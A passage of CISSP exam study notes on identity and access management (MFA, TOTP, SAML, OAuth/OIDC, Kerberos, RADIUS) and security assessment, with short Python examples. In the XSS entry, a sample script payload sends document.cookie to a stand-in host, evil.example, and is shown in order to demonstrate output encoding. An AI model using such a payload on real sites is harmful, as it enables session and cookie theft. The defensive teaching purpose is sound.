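    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

secret = b"12345678901234567890"          # RFC 4226/6238 test secret
print(totp(secret, 59))                    # "287082" -- matches the RFC test vector
# Token and server agree because both compute the same window:
assert totp(secret, 30) == totp(secret, 59)   # same 30-second counter
```

The "synchronous" property is visible in the assert: any two parties with the same secret and (roughly) synchronized clocks produce the same code, with no challenge/response round trip.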
Template: a digital representation of someone's unique biometric features (i.e. a one-way math function
representing biometric data); templates can be used as "1:N" for identification (where the user's template is used
to search for the identity of the user), or "1:1" for authentication (where the user is identified and the template is
used as a factor to authenticate the user)
Whaling attack: phishing attack targeting highly-placed officials/private individuals with sizeable assets
authorizing large-fund wire transfers
XSS: Cross-Site Scripting (XSS) essentially uses reflected input to trick a user's browser into executing
untrusted code from a trusted site; these attacks are a type of injection, in which malicious scripts are injected
into otherwise benign and trusted websites; XSS attacks occur when an attacker uses a web app to send
malicious code, generally in the form of a browser side script, to a different end user; flaws that allow these
attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within
the output it generates without validating or encoding it
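The standard defense the last sentence implies is output encoding: escape user input before echoing it into generated HTML. A minimal sketch using Python's standard library (the payload is a hypothetical cookie-stealing script):

```python
import html

# Hypothetical reflected-XSS payload an attacker might submit as "input":
user_input = '<script>document.location="https://evil.example/?c="+document.cookie</script>'

# Output encoding renders the markup inert before it reaches the page:
safe = html.escape(user_input)

print(safe)
# &lt;script&gt;document.location=&quot;https://evil.example/?c=&quot;+document.cookie&lt;/script&gt;
```

The browser now displays the text instead of executing it; real applications combine this with input validation and a Content Security Policy.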
XST: Cross-Site Tracing (XST) attack involves the use of Cross-site Scripting (XSS) and the TRACE or TRACK
HTTP methods; this could potentially allow the attacker to steal a user's cookies
5.1 Control physical and logical access to assets (OSG-10 Chpt 13)
Controlling access to assets (assets are anything of value to the organization); tangible assets are things you
can touch, and non-tangible assets are things like info and data; controlling access to assets is a central theme
of security
Understand that there is no security without physical security: admin, technical and logical access controls
aren't effective without control over the physical env
Understand what assets you have, and how to protect them
physical security controls: such as perimeter security and environmental controls
control access and the environment
logical access controls: automated systems that auth or deny access based on verification that identify
presented matches that which was previously approved; technical controls used to protect access to
information, systems, devices, and applications
includes authentication, authorization, and permissions
permissions help ensure only authorized entities can access data
logical controls restrict access to config settings on systems/networks to only authed individuals
applies to on-prem and cloud
In addition to personnel, assets can be information, systems, devices, facilities, applications or services
5.1.1 Information
An orgʼs information includes all of its data, stored in simple files (on servers, computers, and small
devices), or in databases
5.1.2 Systems
An orgʼs systems include anything that provides one or more services; a web server with a database is a
system; permissions assigned to user and system accounts control system access
5.1.3 Devices
Devices refer to any computing system (e.g. routers & switches, smartphones, laptops, and printers);
BYOD has been increasingly adopted, and the data stored on the devices is still an asset to the org
5.1.4 Facilities
Any physical location, such as buildings, rooms, and complexes; physical security controls are important
to help protect facilities
5.1.5 Applications
Apps provide access to data; permissions are an easy way to restrict logical access to apps
5.1.6 Services
The point of identity management is to control access to any asset including data, systems, and services;
services include a wide range of process functionality such as printing, end-user support, network
capacity etc; as above, access control is important to secure these services
5.2 Design identification and authentication strategy (e.g., people, devices, and
services) (OSG-10 Chpt 13)
Identification: the process of a subject claiming, or professing an identity
Authentication: verifies the subjectʼs claimed identity through knowledge, ownership, or characteristic,
comparing one or more factors against a database of valid identities, such as user accounts
a core principle with authentication is that all subjects must have unique identities
identification and authentication occur together as a single two-step process
users identify themselves with usernames and authenticate (or prove their identity) with passwords
5.2.1 Groups and Roles
Roles: a set of permissions that corresponds to a job function within an org, rather than a group of users;
a user is assigned a role, and granted the permissions associated with that role
another way of saying this is that roles are function-centric; for instance, helpdesk analyst level-1
is a specific role that defines the specific permissions available
role-based access means that a role with specific permissions is created and then assigned to
someone in that role or job
Groups: a group is a collection of users, and admins can assign permissions to the group instead of
assigning permissions to individual users; this makes it easier to manage larger numbers of users
groups are user-centric, focusing on the collective identity of that group of users
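The role vs. group distinction above can be sketched in a few lines of Python; the role names, permissions, and users here are made up for illustration and not from any real product:

```python
# Roles are function-centric: a role maps directly to a set of permissions.
ROLES = {
    "helpdesk-analyst-l1": {"reset_password", "view_tickets"},
    "helpdesk-analyst-l2": {"reset_password", "view_tickets", "unlock_account"},
}

# Groups are user-centric: a collection of users that permissions can be
# assigned to collectively, easing management of large user populations.
GROUPS = {"helpdesk": {"alice", "bob"}}

# A user is assigned a role, and is granted that role's permissions.
USER_ROLES = {"alice": "helpdesk-analyst-l1"}

def permissions_for(user):
    return ROLES.get(USER_ROLES.get(user), set())

print(sorted(permissions_for("alice")))  # ['reset_password', 'view_tickets']
```

Note how granting "bob" the same job function is a one-line change to `USER_ROLES` rather than copying individual permissions.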
Identity and access management is a collection of processes and technologies that are used to control
access to critical assets; its purpose is the management of access to information, systems, devices, and
facilities
Identity Management (IdM) implementation techniques generally fall into two categories:
centralized access control: implies a single entity within a system performs all authorization
verification
potentially creates a single point of failure
small team can manage initially, and can scale to more users
decentralized access control: (AKA distributed access control) implies several entities located
throughout a system perform auth verification
requires more individuals or teams to manage, and admin may be spread across numerous
locations
difficult to maintain consistency
changes made to any individual access control point need to be repeated at others
With ubiquitous mobile computing and anywhere, anytime access (to apps & data), identity is the "new
perimeter"
5.2.2 Authentication, Authorization and Accounting (AAA) (e.g., multi-factor authentication (MFA), password-
less authentication)
The four key access control services: Identification (assertion of identity), Authentication (verification of
identity), Authorization (definition of access), Accountability (responsibility of actions)
Note that AAA reflects the same principles of Authentication and Authorization, using the word
Accounting instead of Accountability (but it's the same principle)
and remember that the three factors of authentication that you need to understand are knowledge,
ownership, and characteristic (see above)
Two important security elements in an access control system are authorization and accountability
Authorization: subjects are granted access to objects based on proven identities; the level of
access defined for the identified and authenticated user or process
Accountability AKA Principle of Access Control: proper identification, authentication, and
authorization that is logged and monitored; users and other subjects can be held accountable for
their actions when auditing is implemented; accountability is maintained for individual subjects
through the use of auditing; logs record user activities and users can be held accountable for their
logged actions; this encourages good user behavior and compliance with the org's security policy;
also see definitions/interpolations in Domain 2, and above
Auditing: tracks subjects and records when they access objects, creating an audit trail in one or more
audit logs
Auditing provides accountability
Single-factor authentication: any authentication using only one proof of identity
Two-factor authentication (2FA): requires two different proofs of identity
Multifactor authentication (MFA): any authentication using two or more factors
multifactor auth must use multiple types or factors, such as something you know and something
you have
note: requiring users to enter a password and a PIN is NOT multifactor (both are something you
know)
Two-factor methods:
Hash Message Authentication Code (HMAC): includes a hash function used by the HMAC-based
One-Time Password (HOTP) standard to create one-time passwords
Time-based One-Time Password (TOTP): similar to HOTP, but uses a timestamp and remains
valid for a certain time frame (e.g. 30 or 60 seconds)
e.g. phone-based authenticator app, where your phone is mimicking a hardware TOTP token
(combined with userid/password is considered two-factor or two-step authentication)
Email challenge: popular method, used by websites, sending the user an email with a PIN
Short Message Service (SMS): to send users a text with a PIN is another 2-factor method; note that
NIST SP 800-63B points out vulnerabilities, and deprecates use of SMS as a two-factor method for
federal agencies
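The HOTP/TOTP relationship above can be sketched with Python's standard library; this follows RFC 4226 (HOTP) and RFC 6238 (TOTP), and the demo secret is the published RFC 4226 test key:

```python
import hashlib
import hmac
import struct
import time

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    # RFC 4226: HMAC-SHA1 over the 8-byte big-endian counter, then
    # "dynamic truncation" to pick 31 bits, reduced mod 10^digits
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % (10 ** digits)
    return str(code).zfill(digits)

def totp(secret: bytes, step: int = 30, digits: int = 6) -> str:
    # RFC 6238: TOTP is just HOTP with the counter derived from the current
    # time, so each code stays valid for one time step (30 s by default)
    return hotp(secret, int(time.time()) // step, digits)

print(hotp(b"12345678901234567890", 0))  # 755224 (RFC 4226 test vector)
```

This is why a phone authenticator app and a hardware TOTP token can produce the same code: both sides share the secret and a synchronized clock.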
Password-less authentication: a method of verifying a user's identity without requiring them to enter a
password; uses alternate verification forms like biometrics, security tokens, or mobile device
this is an important topic, because password use (and misuse) provide many security headaches
and problems
Advantages of password-less auth include:
increased security
improved user convenience
reduced risk of phishing: even if an attacker gains access to a password, password-less auth
makes it much more difficult for the attacker to access the associated account (say if
password-less auth is via mobile device)
Disadvantages of password-less auth:
dependency on devices (e.g. if via mobile phone, that device is required for access)
biometric issues associated with reliability and privacy
implementation costs associated with additional hardware devices etc
5.2.3 Session management
Session management: the management of sessions created by successful user identification,
authentication, and authorization processes; session management helps prevent unauthorized access by
closing unattended sessions; developers commonly use web frameworks to implement session
management, allowing devs to ensure sessions are closed after they become inactive for a period of time
Session management is important to use with any type of authentication system to prevent unauthorized
access
Session termination strategies:
schedule limitations: setting hours when a system is available
login limitation: preventing simultaneous logins using the same userID
time-outs: session expires after a set amount of inactivity
screensavers: activated after a period of inactivity, requiring re-authentication
Session termination and re-authentication helps to prevent or mitigate session hijacking
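A minimal sketch of the time-out strategy above, assuming an in-memory session store and a 15-minute inactivity window (both illustrative; web frameworks provide this for you):

```python
import time

SESSION_TIMEOUT = 15 * 60  # seconds of inactivity before the session is closed
sessions = {}              # session_id -> last-activity timestamp (in-memory for the sketch)

def touch(session_id):
    # record activity; called on login and on each authenticated request
    sessions[session_id] = time.time()

def is_active(session_id):
    # unknown or expired sessions are closed, forcing re-authentication
    last = sessions.get(session_id)
    if last is None or time.time() - last > SESSION_TIMEOUT:
        sessions.pop(session_id, None)
        return False
    return True
```

Closing the session server-side (not just hiding the UI) is what actually mitigates hijacking of an abandoned session.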
The Open Web Application Security Project (OWASP) publishes “cheat sheets” that provide app
developers with specific recommendations
5.2.4 Registration, proofing, and establishment of identity
Within an organization, new employees prove their identity with appropriate documentation during the
hiring process
in-person identity proofing includes things like passport, DL, birth cert etc
Online orgs often use knowledge-based authentication (KBA) for identity-proofing of someone new
(e.g. a new customer creating a new bank/savings account)
example questions include past vehicle purchases, amount of mortgage payment, previous
addresses, DL numbers
they then query authoritative information (e.g. credit bureaus or gov agencies) for matches
Cognitive Passwords: security questions that are gathered during account creation, which are later used
as questions for authentication (e.g. name of pet, color of first car etc)
one of the flaws associated with cognitive passwords is that the information is often available on
social media sites or general internet searches
5.2.5 Federated Identity Management (FIM)
Federated Identity Management (FIM) systems (a form of SSO) are often used by cloud-based apps
A federated identity links a userʼs identity in one system with multiple identity management systems
FIM allows multiple orgs to join a federation or group, agreeing to share identity information
users in each org can log in once in their own org, and their credentials are matched with a
federated identity
users can then use this federated identity to access resources in any other org within the group
Access policy enforcement: enforcing access control policies within an org to regulate and manage
access
Policy Decision Point (PDP): the system responsible for making access control decisions based on
predefined access policies and rules; a PDP evaluates access requests
Policy Enforcement Point (PEP): responsible for enforcing the access control decisions made by the PDP;
the PEP acts as a gatekeeper
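The PDP/PEP split above can be sketched as two small functions; the policy tuples and request shape are made up for illustration:

```python
# Predefined access policy: (role, resource, action) combinations permitted.
POLICY = {
    ("analyst", "reports", "read"),
    ("admin", "reports", "write"),
}

def pdp_decide(role, resource, action):
    # Policy Decision Point: evaluates the access request against the rules
    return (role, resource, action) in POLICY

def pep_handle(request):
    # Policy Enforcement Point: the gatekeeper that enforces the PDP's decision
    allowed = pdp_decide(request["role"], request["resource"], request["action"])
    return "200 OK" if allowed else "403 Forbidden"

print(pep_handle({"role": "analyst", "resource": "reports", "action": "read"}))   # 200 OK
print(pep_handle({"role": "analyst", "resource": "reports", "action": "write"}))  # 403 Forbidden
```

Separating the two means policy can change centrally (PDP) without touching every enforcement point (PEP).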
5.5 Manage the identity and access provisioning lifecycle (OSG-10 Chpts 13,14)
5.5.1 Account access review (e.g., user, system, service)
Administrators need to periodically review user, system and service accounts to ensure they meet
security policies and that they donʼt have excessive privileges
Be careful in using the local system account as an application service account; although it allows the app
to run without creating a special service account, it usually grants the app more access than it needs
You can use scripts to run periodically and check for unused accounts, and check privileged group
membership, removing unauthorized accounts
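A periodic review script like the one described could look like this sketch; the account records, group names, and 90-day staleness window are all hypothetical (a real script would pull accounts from a directory service):

```python
from datetime import datetime, timedelta

STALE_AFTER = timedelta(days=90)                          # assumed review policy
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins"}  # example privileged groups

def stale_accounts(accounts, now):
    # unused accounts: no login within the staleness window -> candidates to disable
    return [a["name"] for a in accounts if now - a["last_login"] > STALE_AFTER]

def privileged_accounts(accounts):
    # accounts in privileged groups, flagged for manual membership review
    return [a["name"] for a in accounts if PRIVILEGED_GROUPS & set(a["groups"])]

now = datetime(2025, 6, 11)
accounts = [  # made-up sample records
    {"name": "svc-backup", "last_login": now - timedelta(days=120), "groups": ["Backup Operators"]},
    {"name": "jsmith", "last_login": now - timedelta(days=3), "groups": ["Users", "Domain Admins"]},
]

print(stale_accounts(accounts, now))   # ['svc-backup']
print(privileged_accounts(accounts))   # ['jsmith']
```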
Guard against two access control issues:
excessive privilege: occurs when users have more privileges than assigned work tasks dictate;
these privileges should be revoked
creeping privileges (AKA privilege creep): user accounts accumulating additional privileges over
time as job roles and assigned tasks change
5.5.2 Provisioning and deprovisioning (e.g., on/off boarding and transfers)
Identity and access provisioning lifecycle refers to the creation, management, and deletion of accounts
this lifecycle is important because without properly defined and maintained user accounts, a
system is unable to establish accurate identity, perform authentication, provide authorization, and
track accountability
Provisioning/Onboarding
provisioning ensures that accounts have appropriate privileges based on task requirements and that
employees receive needed hardware; said another way, provisioning includes the creation, maintenance,
and removal of user objects from apps, systems, and directories
proper user account creation, or provisioning, ensures that personnel follow specific procedures
when creating accounts
new-user account creation is AKA enrollment or registration
automated provisioning: information is provided to an app, that then creates the accounts via
pre-defined rules (assigning to appropriate groups based on roles)
automated provisioning systems create accounts consistently
workflow provisioning: provisioning that occurs through an established workflow, like an HR
process
provisioning also includes issuing hardware, tokens, smartcards etc to employees
itʼs important to keep accurate records when issuing hardware to employees
after provisioning, an org can follow up with onboarding processes, including:
the employee reads and signs the acceptable use policy (AUP)
explaining security best practices (like infected emails)
reviewing the mobile device policy
ensuring the employeeʼs computer is operational, and they can log in
configure a password manager
explaining how to access help desk
show how to access, share and save resources
Deprovisioning/Offboarding
deprovisioning processes disable or delete an account when employees leave, and offboarding
processes ensure that employees return all hardware the org issued them
deprovisioning/offboarding occurs when an employee leaves the organization or is transferred to a
different department
account revocation: deleting an account is the easiest way to deprovision
an employee's account is usually first disabled
supervisors can then review the userʼs data and determine if anything is needed
note: if a terminated employee retains access to a user account after the exit interview, the risk
of sabotage is very high
deprovisioning includes collecting any hardware issued to an employee such as laptops, mobile
devices and auth tokens
5.5.3 Role definition and transition (e.g., people assigned to new roles)
When a new job role is created, it's important to identify privileges needed by someone in that role; this
ensures that employees in the new roles do not have excessive privileges
Employee responsibilities can change in the form of transfers to a different role, or into a newly created
role
for new roles, itʼs important to define the role and the privileges needed by the employees in that
role
Roles and associated groups need to be defined in terms of privileges
5.5.4 Privilege escalation (e.g., use of sudo, auditing its use)
Privilege escalation: refers to any situation that gives users more privileges than they should have
Attackers use privilege escalation techniques to gain elevated privileges, after exploiting a single system;
typically, they try to gain additional privileges on the exploited systems first
Horizontal privilege escalation: gives an attacker similar privileges as the first compromised user, but
from other accounts
Vertical privilege escalation: provides an attacker with significantly greater privileges
e.g. after compromising a regular userʼs account an attacker can use vertical privilege escalation
techniques to gain administrator privileges on the userʼs computer
the attacker can then use horizontal privilege escalation techniques to access other computers in
the network
this horizontal privilege escalation throughout the network is AKA lateral movement
Limiting privileges given to service accounts reduces the success of some privilege escalation attacks;
this should include minimizing and auditing the use of sudo
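Auditing sudo use often means scanning auth logs for sudo invocations; a sketch is below. The log-line format shown is the common syslog style, but real log paths and formats vary by distro, so treat the regex as illustrative:

```python
import re

# Match the user and COMMAND fields of a typical sudo syslog entry
SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+)\s+:.*COMMAND=(?P<cmd>.*)$")

def sudo_events(lines):
    # return (user, command) pairs for every sudo invocation found
    events = []
    for line in lines:
        m = SUDO_RE.search(line)
        if m:
            events.append((m.group("user"), m.group("cmd")))
    return events

log = [  # made-up sample line in the usual syslog shape
    "May  5 10:01:02 host sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; "
    "USER=root ; COMMAND=/usr/bin/systemctl restart nginx",
]
print(sudo_events(log))  # [('alice', '/usr/bin/systemctl restart nginx')]
```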
5.5.5 Service accounts management
Service accounts: used by applications, services, systems to interact with other resources, services, or
databases without human intervention
even though these accounts are not primarily used by humans for authentication, that doesn't
mean they can be ignored; these accounts and their security need to be reviewed and managed
Service account management: the process of creating, configuring, monitoring, and maintaining service
accounts
ensuring service accounts are secured, reducing the risk of unauthorized access or misuse
5.6 Implement authentication systems (OSG-10 Chpt 14)
Federated Identity Management (FIM): (AKA federated access) one-time authentication to gain access to
multiple systems, including those associated with other organizations; FIM systems link user identities in one
system with other systems to implement SSO; FIM systems are implemented on-premise (providing the most
control), via third-party cloud services, or as hybrid systems; using your Microsoft account to authenticate to a
third-party SaaS is an example of FIM
FIM trust relationships include: principal/user, identity provider (entity that owns the identity and performs
the auth), and relying party (AKA service provider)
FIM protocols include SAML, WS-Federation, OpenID (authentication), and OAuth (authorization)
Compare FIM with SSO: user authenticates one time using SSO to access multiple systems in one org; a
user authenticates one time using FIM to access multiple systems inside and outside an org because of
multiple-entity trust relationships
XML is defined in Domain 8, but essentially Extensible Markup Language is a set of HTML extensions providing
for data storage and transport in networked environments; frequently used to integrate web pages with
databases; XML is often embedded in the HTML files making up elements of a web page
XML does more than describing how to display data, it describes the data itself using tags
Security Assertion Markup Language (SAML)
Security Assertion Markup Language (SAML): an open XML-based standard commonly used to
exchange authentication and authorization (AA) information between federated orgs
Frequently used to integrate cloud services and provides the ability to make authentication and
authorization assertions
SAML provides SSO capabilities for browser access
Organization for the Advancement of Structured Information Standards (OASIS) maintains it
SAML 2.0 is an open XML-based standard
SAML 2.0 spec utilizes three entities:
Principal or User Agent: the principal is the user attempting to use the service
Service Provider (SP) (or relying party): providing a service for the user
Identity Provider (IdP): a third-party that holds the user authentication and authorization info
IdP can send three types of XML messages known as assertions:
Authentication Assertion: provides proof that the user agent provided the proper credentials,
identifies the identification method, and identifies the time the user agent logged on
Authorization Assertion: indicates whether the user agent is authorized to access the requested
service; if denied, includes why
Attribute Assertion: attributes can be any information about the user agent
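The three assertion types above are XML messages; the sketch below parses a heavily simplified SAML-style assertion with Python's standard library. Real SAML 2.0 assertions are signed and carry many more elements, and the subject, timestamp, and attribute values here are invented:

```python
import xml.etree.ElementTree as ET

# Simplified assertion showing the authentication (AuthnStatement) and
# attribute (AttributeStatement) pieces in one document
assertion_xml = """
<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
  <saml:Subject><saml:NameID>alice@example.com</saml:NameID></saml:Subject>
  <saml:AuthnStatement AuthnInstant="2025-06-11T12:00:00Z"/>
  <saml:AttributeStatement>
    <saml:Attribute Name="department"><saml:AttributeValue>IT</saml:AttributeValue></saml:Attribute>
  </saml:AttributeStatement>
</saml:Assertion>
"""

NS = {"saml": "urn:oasis:names:tc:SAML:2.0:assertion"}
root = ET.fromstring(assertion_xml)
name_id = root.find("saml:Subject/saml:NameID", NS).text               # who authenticated
authn_time = root.find("saml:AuthnStatement", NS).get("AuthnInstant")  # when they logged on
dept = root.find(".//saml:AttributeValue", NS).text                    # attribute about the user

print(name_id, authn_time, dept)  # alice@example.com 2025-06-11T12:00:00Z IT
```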
OpenID Connect (OIDC) / Open Authorization (Oauth)
OpenID provides authentication
OpenID Connect (OIDC): an authentication layer using the OAuth 2.0 authorization framework,
maintained by the OpenID Foundation (not IETF); OIDC provides both authentication and authorization
(by using the OAuth framework)
OIDC is a RESTful, JSON (JavaScript Object Notation)-based auth protocol that, when paired with
OAuth, can provide identity verification and basic profile info; uses JSON Web Tokens (JWT) (AKA
ID token)
OAuth and OIDC are used with many web-based applications to share information without sharing
credentials
OAuth provides authorization
OIDC uses the OAuth framework for authorization and builds on the OpenID technologies for
authentication
OAuth 2.0: an open authorization framework described in RFC 6749 (maintained by Internet Engineering
Task Force (IETF))
OAuth exchanges data via APIs
OAuth is the most widely used open standard for authorization and delegation of rights for cloud
services
The most common protocol built on OAuth is OpenID Connect (OIDC); OpenID is used for
authentication
OAuth 2.0 enables third-party apps to obtain limited access to an HTTP service, either on behalf of
a resource owner (by orchestrating an approval interaction), or by allowing third-party applications
to obtain access on its own behalf; OAuth provides the ability to access resources from another
service
OAuth 2.0 is often used for delegated access to applications, e.g. a mobile game that automatically
finds your new friends from a social media app is likely using OAuth 2.0
Conversely, if you sign into a new mobile game using a social media account (instead of creating a user
account just for the game), that process might use OIDC
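The JWT (ID token) mentioned above is three base64url segments, `header.payload.signature`; the sketch below decodes (but deliberately does not verify) the claims. The token is constructed on the spot for illustration, and the issuer/subject values are made up:

```python
import base64
import json

def b64url_decode(seg: str) -> bytes:
    # base64url segments drop their '=' padding; restore it before decoding
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))

def jwt_claims(token: str) -> dict:
    # decode the payload only -- real code MUST verify the signature first
    _header, payload, _signature = token.split(".")
    return json.loads(b64url_decode(payload))

# Build a throwaway token ("e30" is base64url for the empty JSON header {})
claims = {"iss": "https://idp.example.com", "sub": "alice"}
payload = base64.urlsafe_b64encode(json.dumps(claims).encode()).rstrip(b"=").decode()
token = "e30." + payload + ".fake-signature"

print(jwt_claims(token)["sub"])  # alice
```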
Kerberos
Kerberos is the most common SSO method used within orgs
The primary purpose of Kerberos is authentication
Kerberos uses symmetric cryptography and tickets to prove identification and provide
authentication
Kerberos relies on NTP (Network Time Protocol) to sync time between server and clients
Kerberos uses port 88 for auth communications; clients communicate with KDC servers over this port
so that users can effectively access privileged network resources
Kerberos is a network authentication protocol widely used in corporate and private networks and found in
many LDAP and directory services solutions such as Microsoft Active Directory
It provides single sign-on and uses cryptography to strengthen the authentication process and protect
logon credentials
Ticket authentication is a mechanism that employs a third-party entity to prove identification and provide
authentication - Kerberos is a well-known ticket system
After users authenticate and prove their identity, Kerberos uses their proven identity to issue tickets, and
user accounts present these tickets when accessing resources
Kerberos version 5 relies on symmetric-key cryptography (AKA secret-key cryptography) using the
Advanced Encryption Standard (AES) symmetric encryption protocol
Kerberos provides confidentiality and integrity for authentication traffic using end-to-end security and
helps protect against eavesdropping and replay attacks
Kerberos uses UDP port 88 by default
Kerberos elements:
Key Distribution Center (KDC): the trusted third party that provides authentication services
Kerberos Authentication Server: hosts the functions of the KDC:
ticket-granting service (TGS): provides proof that a subject has authenticated through a
KDC and is authorized to request tickets to access other objects
the ticket for the full ticket-granting service is called a ticket-granting ticket (TGT);
when the client asks the KDC for a ticket to a server, it presents credentials in the form
of an authenticator message and a ticket (a TGT) and the ticket-granting service
opens the TGT with its master key, extracts the logon session key for this client, and
uses the logon session key to encrypt the client's copy of a session key for the server
a TGT is encrypted and includes a symmetric key, an expiration time, and userʼs IP
address
subjects present the TGT when requesting tickets to access objects
authentication service (AS): verifies or rejects the authenticity and timeliness of tickets;
often referred to as the KDC
Ticket (AKA service ticket (ST)): an encrypted message that provides proof that a subject is
authorized to access an object
Kerberos Principal: typically a user but can be any entity that can request a ticket
Kerberos realm: a logical area (such as a domain or network) ruled by Kerberos
Kerberos login process:
1. user provides authentication credentials (types a username/password into the client)
2. client/TGS key generated
client encrypts the username with AES for transmission to the KDC
the KDC verifies the username against a db of known credentials
the KDC generates a symmetric key that will be used by the client and the Kerberos server
it encrypts this with a hash of the userʼs password
3. TGT generated - the KDC generates an encrypted timestamped TGT
4. client/server ticket generated
the KDC then transmits the encrypted symmetric key and the encrypted timestamped TGT to
the client
the client installs the TGT for use until it expires
the client also decrypts the symmetric key using a hash of the userʼs password
NOTE: the clientʼs password is never transmitted over the network, but it is verified
the server encrypts a symmetric key using a hash of the userʼs password, and it can
only be decrypted with a hash of the userʼs password
5. user accesses requested service
When a client wants to access an object (like a hosted resource), it must request a ticket through the
Kerberos server, in the following steps:
the client sends its TGT back to the KDC with a request for access to the resource
the KDC verifies that the TGT is valid, and checks its access control matrix to verify user privileges
for the requested resource
the KDC generates a service ticket and sends it to the client
the client sends the ticket to the server or service hosting the resource
the server or service hosting the resource verifies the validity of the ticket with the KDC
once identity and authorization are verified, Kerberos activity is complete
the server or service host then opens a session with the client and begins communication or
data transmission
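The key idea in the flow above (both sides derive the long-term key from the user's password, so the password itself never crosses the network) can be illustrated with a toy sketch. This is deliberately non-cryptographic: real Kerberos uses AES, and the XOR "cipher" here is only a stand-in:

```python
import hashlib
import os

def toy_encrypt(key: bytes, data: bytes) -> bytes:
    # XOR with a hash-derived keystream -- a stand-in for AES, NOT real crypto
    stream = hashlib.sha256(key + b"keystream").digest()
    return bytes(d ^ s for d, s in zip(data, stream))

toy_decrypt = toy_encrypt  # XOR is its own inverse

# Both sides independently derive the long-term key from the password
password = "correct horse"  # never sent over the wire
client_key = hashlib.sha256(password.encode()).digest()
kdc_user_db = {"alice": client_key}  # KDC's copy, stored at enrollment

# KDC side: generate a session key, send it encrypted under the client's key
session_key = os.urandom(16)
wire_msg = toy_encrypt(kdc_user_db["alice"], session_key)

# Client side: recover the session key with the locally derived key
recovered = toy_decrypt(client_key, wire_msg)
assert recovered == session_key  # only a holder of the password hash can do this
```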
Remote Authentication Dial-in User Service (RADIUS) / Terminal Access Controller Access Control System Plus
(TACACS+)
Several protocols provide centralized authentication, authorization, and accounting services; network (or
remote) access systems use AAA protocols
Remote Authentication Dial-in User Service (RADIUS): centralizes authentication for remote access
connections, such as VPNs or dial-up access
a user can connect to any network access server, which then passes on the userʼs credentials to
the RADIUS server to verify authentication and authorization and to track accounting
in this context, the network access server is the RADIUS client, and a RADIUS server acts as an
authentication server
the RADIUS server also provides AAA services for multiple remote access servers
RADIUS uses the User Datagram Protocol (UDP) by default and encrypts only the passwordʼs
exchange
RADIUS using Transport Layer Security (TLS) over TCP (port 2083) is defined by RFC 6614
RADIUS uses UDP port 1812 for RADIUS messages and UDP port 1813 for RADIUS Accounting
messages
RADIUS encrypts only the passwordʼs exchange by default
it is possible to use RADIUS/TLS to encrypt the entire session
Cisco developed Terminal Access Controller Access Control System Plus (TACACS+) and released it as
an open standard
provides improvements over the earlier version and over RADIUS; it separates authentication,
authorization, and accounting into separate processes, which can be hosted on three different
servers
additionally, TACACS+ encrypts all of the authentication information, not just the password, as
RADIUS does
TACACS+ uses TCP port 49, providing a higher level of reliability for the packet transmissions
Diameter AAA protocol: an advanced system designed to address the limitations of the older RADIUS
protocol (diameter is twice the radius!); Diameter improves on RADIUS by providing enhanced security
(uses IPsec or TLS instead of MD5 hashing), supports more extensive attribute sets (suitable for large,
complex networks), and can handle complex sessions
Diameter is based on RADIUS and improves many of its weaknesses, but Diameter is not
compatible with RADIUS
Domain-6 Security Assessment and Testing
Security assessment and testing programs are an important mechanism for validating the on-going effectiveness of
security controls; this domain accounts for ~12% of the exam
Security assessment and testing include a variety of tools, such as vulnerability assessments, penetration tests,
software testing, audits, and other control validation; every org should have a security assessment and testing
program defined and operational
Security assessments: comprehensive reviews of the security of a system, application, or other tested
environment
during a security assessment, a trained information security professional performs a risk assessment that
identifies vulnerabilities in the tested environment that may allow a compromise and makes
recommendations for remediation, as needed
a security assessment includes the use of security testing tools, but goes beyond scanning and manual
penetration tests
the main work product of a security assessment is normally an assessment report addressed to
management that contains the results of the assessment in nontechnical language and concludes with
specific recommendations for improving the security of the tested environment
An organizationʼs audit strategy will depend on its size, industry, financial status and other factors
a small non-profit, a small private company and a small public company will have different requirements
and goals for their audit strategies
the audit strategy should be assessed and tested regularly to ensure that the organization is not doing a
disservice to itself with the current strategy
there are three types of audit strategies: internal, external, and third-party
Software testing verifies that code functions as designed and doesn't contain security flaws
Security management needs to perform a variety of activities to properly oversee the information security
program
Log reviews, especially for admin activities, ensure that systems are not misused
Account management reviews ensure that only authorized users have access to information and systems
Backup verification ensures that the org's data protection process is working properly
Key performance and risk indicators provide a high-level view of security program effectiveness
Artifact: piece of evidence such as text, or a reference to a resource which is submitted in response to a
question
Assessment: testing or evaluation of controls to understand which are implemented correctly, operating as
intended and producing the desired outcome in meeting the security or privacy requirements of a system or org
Audit: process of reviewing a system for compliance against a standard or baseline (e.g. audit of security
controls, baselines, financial records) can be formal and independent, or informal/internal
Chaos Engineering: discipline of experiments on a software system in production to build confidence in the
system's capabilities to withstand turbulent/unexpected conditions
Code testing suite: usually used to validate function, statement, branch and condition coverage
Compliance Calendar: tracks an org's audits, assessments, required filings, due dates and related
Compliance Tests: an evaluation that determines if an org's controls are being applied according to
management policies and procedures
Examination: process of reviewing/inspecting/observing/studying/analyzing specs/mechanisms/activities to
understand, clarify, or obtain evidence
FedRAMP: (see Domain 1) a government-wide program that standardizes the security assessment,
authorization, and monitoring of cloud services and products; the program was established in 2011 to help the
federal government use cloud technologies while protecting federal information
Findings: results created by the application of an assessment procedure
Functional order of controls: deter, deny, detect, delay, determine, and decide
Fuzzing: uses modified inputs to test software performance under unexpected circumstances
Mutation (dumb) fuzzing modifies known inputs to generate synthetic inputs that may trigger unexpected
behavior
Generational (intelligent) fuzzing develops inputs based on models of expected inputs to perform the
same task
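A minimal mutation ("dumb") fuzzer is just a loop that flips bytes in a known-good input and watches the target for crashes; the sketch below shows the idea (the target function and round counts are placeholders):

```python
import random

def mutate(data: bytes, n_flips: int = 3) -> bytes:
    # mutation fuzzing: modify a known input to generate a synthetic one
    buf = bytearray(data)
    for _ in range(n_flips):
        i = random.randrange(len(buf))
        buf[i] ^= random.randrange(1, 256)  # flip some bits at a random offset
    return bytes(buf)

def fuzz(target, seed: bytes, rounds: int = 1000):
    # feed mutants to the target; exceptions stand in for crashes
    crashes = []
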